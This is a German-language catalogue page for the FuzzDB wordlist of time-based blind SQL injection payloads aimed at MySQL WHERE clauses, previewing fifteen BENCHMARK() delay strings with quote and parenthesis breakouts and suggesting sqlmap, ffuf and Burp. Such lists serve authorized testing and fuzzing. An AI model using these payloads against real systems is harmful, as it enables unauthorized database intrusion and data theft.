Skip to content
Fuzzing1.8 KB

FuzzDB Blind SQLi MySQL WHERE Clause

Zeitbasierte Blind-SQL-Injection-Payloads für MySQL-WHERE-Klauseln, die BENCHMARK()-Verzögerungen über verschiedene Quote-/Klammer-Breakout-Kontexte hinweg nutzen.

Quelle ansehen
Größe
1.8 KB
Kategorie
Fuzzing
Quelle
fuzzdb-project/fuzzdb
Lizenz
GPLv2
Empfohlene Tools
sqlmapffufburp

Vorschau

Die ersten 15 Einträge. Lade die vollständige Liste (1.8 KB) herunter oder kopiere sie über die Schaltflächen oben.

>head blind-sqli-mysql-where-fuzzdb.txt1.8 KB
 and 0=benchmark(3000000,MD5(1))%20/*
 and 0=benchmark(3000000,MD5(1))%20--
 and 0=benchmark(3000000,MD5(1))%20%23
' and 0=benchmark(3000000,MD5(1))%20/*
' and 0=benchmark(3000000,MD5(1))%20--
' and 0=benchmark(3000000,MD5(1))%20%23
" and 0=benchmark(3000000,MD5(1))%20/*
" and 0=benchmark(3000000,MD5(1))%20--
" and 0=benchmark(3000000,MD5(1))%20%23
) and 0=benchmark(3000000,MD5(1))%20/*
) and 0=benchmark(3000000,MD5(1))%20--
) and 0=benchmark(3000000,MD5(1))%20%23
)) and 0=benchmark(3000000,MD5(1))%20/*
)) and 0=benchmark(3000000,MD5(1))%20--
)) and 0=benchmark(3000000,MD5(1))%20%23

Zeitbasierte Blind-SQL-Injection-Payloads für MySQL-WHERE-Klauseln, die BENCHMARK()-Verzögerungen über verschiedene Quote-/Klammer-Breakout-Kontexte hinweg nutzen.

Diese Liste ist auf Input-Fuzzing und Schwachstellensuche ausgerichtet. Sie umfasst rund 1.8 KB und harmoniert gut mit Tools wie sqlmap, ffuf, burp. Wählen Sie die kleinste Liste, die zu Ihrem Auftrag passt: Kürzere Listen sind schneller und unauffälliger bei Online- Angriffen, während größere Listen eine breitere Abdeckung für Offline-Arbeiten bieten, bei denen Geschwindigkeit weniger eine Einschränkung darstellt.

Sie können die Beispielvorschau direkt von dieser Seite kopieren, die gesamte Liste in Ihre Zwischenablage kopieren oder die rohe .txt-Datei herunterladen. Die vollständige Liste wird direkt aus ihrer Upstream-Quelle auf GitHub ausgeliefert.

Bezogen von fuzzdb-project/fuzzdb und vertrieben unter GPLv2. Verwenden Sie Wortlisten nur gegen Systeme, für deren Test Sie ausdrücklich autorisiert sind.